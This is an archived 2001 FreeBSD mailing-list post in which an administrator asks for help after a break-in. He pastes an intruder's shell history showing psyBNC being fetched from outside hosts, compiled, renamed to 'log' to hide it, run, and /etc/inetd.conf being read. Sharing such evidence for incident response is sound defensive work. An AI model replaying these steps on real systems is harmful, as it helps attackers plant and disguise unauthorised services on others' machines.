From owner-freebsd-questions  Wed Aug  8 18:59:43 2001
Delivered-To: freebsd-questions@freebsd.org
Received: from web12007.mail.yahoo.com (web12007.mail.yahoo.com [216.136.172.215])
	by hub.freebsd.org (Postfix) with SMTP id BDE6E37B413
	for <freebsd-questions@freebsd.org>; Wed,  8 Aug 2001 18:59:27 -0700 (PDT)
	(envelope-from bsd2000au@yahoo.com.au)
Message-ID: <20010809015927.36963.qmail@web12007.mail.yahoo.com>
Received: from [61.9.188.204] by web12007.mail.yahoo.com; Thu, 09 Aug 2001 11:59:27 EST
Date: Thu, 9 Aug 2001 11:59:27 +1000 (EST)
From: =?iso-8859-1?q?Keith=20Spencer?= <bsd2000au@yahoo.com.au>
Subject: Yep-I been hacked! Whats psyBNC? Someone installed it
To: fbsd <freebsd-questions@freebsd.org>
MIME-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit
Sender: owner-freebsd-questions@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-questions.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-questions>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-questions>
X-Loop: FreeBSD.ORG

Hi all,
I am on the trail here.
I know zero about security (almost)
But I found in a user dir all this stuff and lloking
in the .bash_history for the user I find the stuff
below. I am no genius but I figure I can see some
seriously nasty stuff here!
Can someone help me make sense of it?
Thanks
Keith 
+++ 8< SNIP---------------------------
exit
w
ls
fetch http://www.psychoid.lam3rz.de/psyBNC2.2.1.tar.gz
fetch http://www.psychoid.lam3rz.de/psyBNC2.2.1.tar.gz
fetch www.psychoid.lam3rz.de/psyBNC2.2.1.tar.gz
lynx www.psychoid.lam3rz.de/psyBNC2.2.1.tar.gz
lynx http://www.psychoid.lam3rz.de/psyBNC2.2.1.tar.gz
lynx 64.65.0.134/psyBNC2.2.1.tar.gz
ftp ftp.geocities.com
ftp 209.1.225.146
tar zxvf psybnc*
rm -f psybnc.tgz
mv psybnc logs
cd logs
make
./psybnc
ls
make FreeBSD
make bsd
make menuconfig
make
cat psybnc.conf
mv psybnc.conf log.conf
mv psybnc log
./log
ls
mv log psybnc
./psybnc
cd psybnc
ls
./psybnc
pwd
cp psybnc /usr/home/bsd/logs/psybnc
cp psybnc /usr/home/bsd/logs/
cd ..
mv psybnc dir
cd dir
 cp psybnc /usr/home/bsd/logs/
cd ..
./psybnc
./psybnc log.conf
kill -9 24639
rm -rf dir
mv psybnc log
./log
./log log.conf
ps x
exit
w
telnet 127.0.0.1
cat /etc/inetd.conf
exit



_____________________________________________________________________________
http://shopping.yahoo.com.au - Father's Day Shopping
- Find the perfect gift for your Dad for Father's Day

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-questions" in the body of the message